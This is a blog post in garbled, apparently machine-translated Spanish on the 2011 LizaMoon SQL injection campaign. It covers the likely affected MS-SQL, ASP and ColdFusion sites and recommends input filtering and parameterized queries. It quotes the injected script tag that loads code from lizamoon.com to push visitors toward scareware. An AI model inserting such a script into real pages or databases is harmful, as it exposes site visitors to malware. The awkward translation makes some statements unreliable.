El gran ataque de inyección SQL Lizamoon – Marzo-abril 2011



Bien – Viernes cosas empezaron a ponerse interesante en sitios de noticias de tecnología. La mayoría de los sitios estaban corriendo falsas historias de los Inocentes y una Websense incluyendo algunas se ejecutan con un gran ataque ocurre frente a muchos sitios web basados ​​en SQL. Los detalles son vagos – las personas se les dijo que buscará los archivos ur.php en su directorio web (que no es exactamente una buena prueba para ver si su sitio ha sido infectado por esta inyección de SQL…) “<script src = http://lizamoon.com / ur.php”> es un ejemplo del código que se introduce en bases de datos SQL y lo que hace, básicamente, es la fuerza de los visitantes a visitar un sitio scareware donde el malware puede ser instalado en su ordenador que dice que tiene un virus…. (¿Cuántos de los que hemos visto en el último 5-10 años?)

Uno de mis molestias con las noticias tecnológicas (y especialmente virus de noticias) la cobertura es que cuando una historia se vuelve lo suficientemente grande para ser cubierta por los grandes medios de comunicación, que nunca le hacen justicia. Quiero información. Lo que se esta atacando? ¿Qué son los programas vulnerables, ¿hay un patrón?


Esta es una de las cosas que me molesta acerca de la cobertura de esta particular bestia…. bien, bien, es una inyección SQL – es mysql? MS-SQL? alguna otra mezcla? ¿Es atacar WordPress o Drupal o Movable Type o lo que? No mucho detalle se encontraba. Hubo afirmaciones escandalosas de 4 millones de sitios infectados (que es muy exagerados.) La mejor estimación que he visto es en el 200,000+ serie. Las búsquedas de Google mostró millones de páginas con el texto sospechoso a pesar de que incluía varias páginas por sitio y muchos sitios que simplemente estaban informando sobre la hazaña.

So…. Sábado me preguntó acerca de ello y que no había sido capaz de hacer mucha invSontigación. So, Hice un poco de investigación y encontró que al parecer la mayoría de cada sitio afectado que habían sido identificados por Websense fue un back-end de Microsoft SQL. En ese momento la respiración un poco más fácil en el hecho de que no voy a actualizar con urgencia 50 más o menos MySQL motores de blogs basados ​​en… De hecho, después de leer un poco más lejos que en esencia se presentó el fin de semana como no tengo nada desplegado que depende de MS-SQL.

Son, Hoy estaba pensando que debe haber un patrón en cuanto a qué es vulnerable…. En cuanto a la Google búsqueda que muestra la propaganda de infectados de código….

Lo que veo. Páginas cfm, .asp, .aspx, He encontrado un sitio con esta alimentado por:

“Blog de Mango – Un motor de blogs de ColdFusion”

Veo muchos otros sitios que parecen ser la base de datos impulsada, pero no está claro qué motor de diseño del sitio que estoy lookiing a cabo. En realidad, el denominador común es la fusión asp / calor y un marco de Microsofts para aplicaciones web.

El mejor consejo que se da es que siempre se debe filtrar / filtrar los datos en bases de datos. En otras palabras, no me fío de los visitantes del sitio para poner en las cosas buenas de las formas. Confíe en ellos para tratar de romper a través de la base de datos por debajo por el uso de caracteres que se van a dar una pista a su base de datos que es el momento de hacer un comando en lugar de tratar la entrada de texto.

Hay un buen artículo sobre asp.net La prevención de inyección SQL.

Realmente es una reminiscencia de esta caricatura genial…. sobre pequeñas tablas de Bobby….

Dicho lo anterior…. parece que una mejor consejo es que paramaterize las llamadas SQL….

Sitio de buen tutorial sobre cómo evitar problemas de inyección SQL…

Sospecho que hay muchos cientos de propietarios de los sitios que aún no son conscientes de que estaban comprometidos.

Así que aquí está la flamebait – son pobres codificación SQL practica un rasgo común en el entorno de Microsoft kit de herramientas?

Dudo que sea sólo un problema de caja de herramientas de MS – aunque la proliferación de las “fácil de hacer que su sitio de base de datos impulsada por propia” conjunto de herramientas que parece fomentar el diseño descuidado. (Sí – Sé que… abiertos los motores de fuentes basadas en blogs han tenido su parte de las cuestiones de inyección SQL también….)

Hacer que sea fácil para cualquiera crear una página web de base de datos impulsada no significa que todos sigan las mejores prácticas para validar la entrada. (De hecho, en la mayoría de las cosas que he visto – facilitar las cosas parece animar a los atajos…)

Artículos Relacionados

Blog Traffic Exchange Artículos Relacionados
  • La mayor vulnerabilidad de la seguridad informática cada vez Puedo hablar un poco acerca de los virus informáticos y seguridad informática en este sitio. Es probablemente uno de los problemas más grandes que tus manos en mis clientes. Hoy voy a hablar de la vulnerabilidad de equipo de seguridad más grande que hay. De hecho, se trata de una vulnerabilidad de seguridad en general. Se ......
  • Zotob actualizaciones Un par de cambios al caer la tarde en el diario de los controladores en el incidents.org (Sin la regulación). Para empezar, parece que puede haber una variación de Zotob que tiene una masa de correo incluido. No vi específicamente esto en los relatos de Zotob.A o Zotob.B del SARC, Sáb, Me pregunto si esto es ......
  • Real VNC 4.1.1 vulnerabilidad - Acceso remoto sin contraseña Este es un vale la pena mirar a nadie usando VNC para administración remota. Parece como si IntelliAdmin ha encontrado una vulnerabilidad en el Real VNC 4 (el puesto de slashdot vi sugirió "cualquier máquina que tenga VNC 4.1") No he probado todavía, así que no sé si esto sólo afecta a los RealVNC ......
Blog Traffic Exchange Sitios Web relacionados
  • Formas efectivas de tráfico a los sitios afiliados El tráfico es una de las cosas más difíciles de conseguir como afiliado. ¿Cómo se puede conseguir sin gastar su dinero y cómo conseguir tráfico que en realidad se convierte en ventas o clientes potenciales? Una cosa es absolutamente clara a cualquier afiliado que se inicia la promoción de productos: ita ¢ Â € Â ™ s casi ......
  • Blog El aumento de tráfico del sitio Está atrayendo tráfico del blog sitio realmente una tarea difícil? ¿Hay alguna verdad, formas muy simples que una nueva persona a los blogs pueden aumentar su tráfico de sitio de blogs? Estas son algunas de las maneras que usted puede atraer nuevos tráficos sitio del blog de su sitio web sin dificultad, así como ......
  • Inseguridad Social (redux) Escribí acerca de las altas tasas de Phantom uno puede encontrar debido a la imposición sobre beneficios del Seguro Social, y sigo recibiendo comentarios positivos sobre este artículo. Recibí dos preguntas, que me pareció apropiada para hacer frente a este. ¿Hay una edad después de que se puede ganar tanto ......
en.pdf24.org    Enviar artículo como PDF   

Mensajes similares


Vea lo que sucedió este día en la historia de cualquiera de BBC Wikipedia
Buscar:
Palabras clave:
Amazon Logo

Los comentarios están cerrados.


Cambie a nuestro sitio móvil